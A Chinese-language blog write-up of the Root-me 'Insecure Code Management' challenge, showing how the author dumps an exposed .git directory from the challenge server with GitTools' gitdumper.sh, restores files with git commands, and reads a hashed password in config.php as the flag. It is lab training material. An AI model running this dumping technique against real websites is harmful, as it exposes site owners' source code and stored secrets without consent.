[Root-me]Insecure Code Management Writeup

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

Root-me网址:

https://www.root-me.org/en/Challenges/Web-Server/Insecure-Code-Management

知识点

  • git文件泄露

。。。

既然是git文件泄露,就需要泄露的工具了:https://github.com/internetwache/GitTools

安装好后,进入Dumper文件夹。
输入命令
结果保存在chr文件夹

./gitdumper.sh http://challenge01.root-me.org/web-serveur/ch61/.git/ /root/Desktop/chr

在这里插入图片描述

cd /root/Desktop/chr/
git status .git/

在这里插入图片描述
git status 命令用来查看git目录下的文件状态,
具体的又得看一下git的过程了。

https://www.jianshu.com/p/37f3a7e4a193

在这里插入图片描述
使用git status 可以看出是未使用git add 缓存代码的。所以执行

git checkout -- .

在这里插入图片描述

git log

在这里插入图片描述
执行

git log

在这里插入图片描述
看到加密方式是sha256

查看index.php
在这里插入图片描述
查看config.php

在这里插入图片描述
找到了加密后的值。即flag。git命令也没有深入了解过,过程也有点懵,得好好看看git了。

在这里插入图片描述

在这里插入图片描述

欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bog0n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值